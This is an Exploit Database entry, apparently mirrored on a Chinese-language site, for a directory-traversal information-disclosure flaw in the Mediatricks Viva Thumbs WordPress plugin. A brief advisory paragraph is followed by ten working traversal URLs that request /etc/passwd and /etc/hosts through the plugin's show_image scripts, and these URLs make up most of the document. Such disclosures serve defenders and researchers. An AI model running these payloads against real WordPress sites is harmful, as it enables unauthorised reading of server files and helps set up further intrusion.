WordPress Plugin Mediatricks Viva Thumbs – Multiple Information Disclosure Vulnerabilities

• Exploit Database
• 51 阅读

• 作者： Richard Brain
  日期： 2010-12-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35133/

• source: https://www.securityfocus.com/bid/45539/info
  
  The Mediatricks Viva Thumbs plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
  
  Attackers can exploit these issues using directory-traversal strings to confirm the existence of local files outside of the WordPress webroot. Information obtained can aid in launching further attacks. 
  
  http://www.example.com/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
  http://www.example.com/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd
  http://www.example.com/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
  http://www.example.com/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
  http://www.example.com/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
  http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
  http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
  http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
  http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
  http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts